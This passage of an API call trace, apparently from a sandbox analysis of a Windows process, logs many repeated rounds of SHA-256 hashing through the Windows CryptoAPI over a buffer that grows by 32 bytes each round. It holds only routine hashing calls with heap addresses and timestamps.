hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54730 [0146.918] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54730, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54730, pdwDataLen=0xcea1c) returned 1 [0146.918] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.918] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.918] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.919] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.919] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0146.919] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.919] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54a90 [0146.919] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e54a90, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54a90, pdwDataLen=0xcea1c) returned 1 [0146.919] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0146.919] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.919] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.920] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.920] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x400, dwFlags=0x0) returned 1 [0146.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54dc0 [0146.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54dc0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54dc0, pdwDataLen=0xcea1c) returned 1 [0146.920] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.920] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.920] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.920] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.920] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x420, dwFlags=0x0) returned 1 [0146.920] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54df0 [0146.920] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54df0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54df0, pdwDataLen=0xcea1c) returned 1 [0146.920] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.920] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.920] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.921] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.921] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x440, dwFlags=0x0) returned 1 [0146.921] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54340 [0146.921] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54340, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54340, pdwDataLen=0xcea1c) returned 1 [0146.921] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.921] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.921] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.923] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.923] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x460, dwFlags=0x0) returned 1 [0146.923] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.923] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54be0 [0146.923] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54be0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54be0, pdwDataLen=0xcea1c) returned 1 [0146.923] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.923] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.923] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.923] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.923] CryptHashData (hHash=0x332b7900, pbData=0x32e4a600, dwDataLen=0x480, dwFlags=0x0) returned 1 [0146.923] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.923] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54e20 [0146.923] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e54e20, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54e20, pdwDataLen=0xcea1c) returned 1 [0146.923] CryptDestroyHash (hHash=0x332b7900) returned 1 [0146.923] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.924] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.924] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.924] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0146.924] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54e50 [0146.924] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54e50, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54e50, pdwDataLen=0xcea1c) returned 1 [0146.924] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.924] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.924] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.925] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.925] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0146.925] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54c10 [0146.925] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e54c10, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54c10, pdwDataLen=0xcea1c) returned 1 [0146.925] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.925] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.925] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.925] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.925] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0146.925] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54370 [0146.926] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54370, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54370, pdwDataLen=0xcea1c) returned 1 [0146.926] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.926] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.926] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.926] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.926] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x500, dwFlags=0x0) returned 1 [0146.926] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54400 [0146.926] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e54400, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54400, pdwDataLen=0xcea1c) returned 1 [0146.926] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.926] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.926] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.927] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.927] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0x520, dwFlags=0x0) returned 1 [0146.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54760 [0146.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e54760, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54760, pdwDataLen=0xcea1c) returned 1 [0146.927] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0146.927] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.927] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.928] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.928] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x540, dwFlags=0x0) returned 1 [0146.928] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54460 [0146.928] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54460, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54460, pdwDataLen=0xcea1c) returned 1 [0146.928] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.928] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.928] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.928] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.928] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x560, dwFlags=0x0) returned 1 [0146.928] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e547f0 [0146.929] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e547f0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e547f0, pdwDataLen=0xcea1c) returned 1 [0146.929] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.929] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.929] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.929] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.929] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x580, dwFlags=0x0) returned 1 [0146.929] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54490 [0146.929] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54490, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54490, pdwDataLen=0xcea1c) returned 1 [0146.929] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.929] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.929] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.930] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.930] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0146.930] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54580 [0146.930] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x2, pbData=0x32e54580, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54580, pdwDataLen=0xcea1c) returned 1 [0146.930] CryptDestroyHash (hHash=0x332b7820) returned 1 [0146.930] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.930] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.931] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.931] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0146.931] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54910 [0146.931] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54910, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54910, pdwDataLen=0xcea1c) returned 1 [0146.931] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.931] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.931] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.931] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.931] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0146.931] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e545e0 [0146.931] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e545e0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e545e0, pdwDataLen=0xcea1c) returned 1 [0146.931] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0146.931] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.931] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.932] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.932] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x600, dwFlags=0x0) returned 1 [0146.932] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.932] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54610 [0146.932] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54610, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54610, pdwDataLen=0xcea1c) returned 1 [0146.932] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.932] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.932] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.932] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.933] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x620, dwFlags=0x0) returned 1 [0146.933] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e549a0 [0146.933] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e549a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e549a0, pdwDataLen=0xcea1c) returned 1 [0146.933] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0146.933] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.933] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.933] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.933] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x640, dwFlags=0x0) returned 1 [0146.933] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e548b0 [0146.933] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e548b0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e548b0, pdwDataLen=0xcea1c) returned 1 [0146.933] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.933] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.933] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.934] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.934] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x660, dwFlags=0x0) returned 1 [0146.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54820 [0146.934] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54820, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54820, pdwDataLen=0xcea1c) returned 1 [0146.934] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.934] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.934] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.935] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.935] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x680, dwFlags=0x0) returned 1 [0146.935] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e549d0 [0146.935] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e549d0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e549d0, pdwDataLen=0xcea1c) returned 1 [0146.935] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0146.935] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.935] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.935] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.935] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0146.935] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e547c0 [0146.935] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e547c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e547c0, pdwDataLen=0xcea1c) returned 1 [0146.935] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.935] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.935] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.936] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.936] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0146.936] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.936] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54640 [0146.936] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x2, pbData=0x32e54640, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54640, pdwDataLen=0xcea1c) returned 1 [0146.936] CryptDestroyHash (hHash=0x332b7820) returned 1 [0146.936] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.936] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.938] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.938] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0146.938] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54940 [0146.938] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54940, pdwDataLen=0xcea1c, dwFlags=0x0 | out: 